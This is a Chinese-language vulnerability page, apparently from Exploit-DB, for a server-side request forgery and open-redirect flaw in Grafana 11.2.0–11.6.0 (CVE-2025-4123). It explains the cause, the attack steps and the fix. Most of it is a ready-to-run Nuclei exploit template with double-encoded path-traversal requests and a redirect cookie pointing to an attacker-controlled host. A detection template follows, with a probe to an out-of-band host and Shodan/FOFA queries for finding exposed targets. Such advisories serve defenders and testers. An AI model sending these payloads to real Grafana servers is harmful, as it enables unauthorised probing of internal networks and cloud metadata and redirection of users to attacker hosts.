[webapps] Grafana 11.6.0 - SSRF
CVE-2025-4123
Grafana 11.6.0 存在SSRF漏洞,可被用于探测内部网络资源。
High · CVSS 7.5📋 漏洞基础信息
| CVE | CVE-2025-4123 |
|---|---|
| 漏洞类型 | 服务端请求伪造(SSRF) |
| 受影响版本 | Grafana 11.6.0 |
| 危害等级 | High · CVSS 7.5 |
| 发布日期 | 2026-04-06 |
| 提交者 | Beatriz Fresno Naumova |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
漏洞存在于 Grafana 的某个API端点或功能中,未对用户提供的URL进行充分过滤或白名单校验,导致服务器能够向攻击者指定的内部地址发起HTTP请求。
🎯 攻击场景
1. 攻击者登录Grafana或找到无需认证的端点;2. 构造包含内网IP或特殊协议的URL请求;3. 向目标端点发送恶意请求,Grafana服务端发起请求并返回响应,泄露内网信息。
💥 漏洞影响
攻击者可通过SSRF探测内部网络结构、访问内部管理页面或云元数据接口,可能导致敏感信息泄露。
⚔️ Nuclei Exploit 模板
以下为标准 Nuclei v3 格式的利用模板,可直接用于漏洞验证:
id: CVE-2025-4123-exploit
info:
name: Grafana 11.2.0 - 11.6.0 SSRF Exploit
author: Beatriz Fresno Naumova
severity: high
description: Exploits an SSRF vulnerability in Grafana's render/public endpoint. An attacker can cause the server to perform requests to attacker-controlled hosts or induce redirections, potentially leading to information disclosure.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4123
metadata:
verified: true
shodan-query: title:"Grafana"
fofa-query: app="Grafana"
component: Grafana
version: 11.2.0 - 11.6.0
tags: grafana,ssrf,cve,cve2025
variables:
attacker_host: "{{attacker_host}}"
attacker_port: "80"
http:
- raw:
- |
GET /render/public/..%252f%255C{{attacker_host}}%252f%253F%252f..%252f.. HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Fedora; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0
Connection: close
Accept-Encoding: gzip
- |
GET /public/..%2F%5C{{attacker_host}}%2F%3f%2F..%2F.. HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12) AppleWebKit/616.19 (KHTML, like Gecko) Version/17.7.17 Safari/616.19
Connection: close
Cookie: redirect_to=%2Frender%2Fpublic%2F..%25252f%25255C{{attacker_host}}%25252f%25253F%25252f..%25252f..
Accept-Encoding: gzip
matchers:
- type: dsl
dsl:
- 'contains(body, "plugin setting is not configured") == false'
- 'status_code != 404'
- 'status_code != 502'
condition: and🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2025-4123-detection
info:
name: Grafana 11.2.0 - 11.6.0 SSRF Detection
author: Beatriz Fresno Naumova
severity: high
description: Detects if Grafana is running a version within the vulnerable range (11.2.0 - 11.6.0) and if the /render/public endpoint is accessible.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4123
metadata:
verified: true
shodan-query: title:"Grafana"
fofa-query: app="Grafana"
component: Grafana
version: 11.2.0 - 11.6.0
tags: grafana,ssrf,cve,cve2025
http:
- method: GET
path:
- '{{BaseURL}}/api/health'
matchers:
- type: dsl
dsl:
- 'contains(body, "Grafana") == true'
- 'contains(body, "\"version\"") == true'
condition: and
extractors:
- type: regex
part: body
regex:
- '"version": ?"([0-9]+\.[0-9]+\.[0-9]+)"'
- '"database": ?".*?"'
internal: true
- method: GET
path:
- '{{BaseURL}}/render/public/..%252f%255Ctest.oastify.com%252f%253F%252f..%252f..'
matchers:
- type: word
words:
- 'plugin setting is not configured'
- 'Image Renderer'
- 'open redirect'
condition: or
extractors:
- type: regex
part: body
regex:
- '(Grafana|grafana) (v[0-9]+\.[0-9]+\.[0-9]+|[0-9]+\.[0-9]+\.[0-9]+)'🛡️ 修复建议
升级到Grafana 11.6.0之后的安全版本;严格限制URL请求的白名单,禁止对私有地址段的请求。
📎 参考链接
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-07 07:42 | 来源: Exploit-DB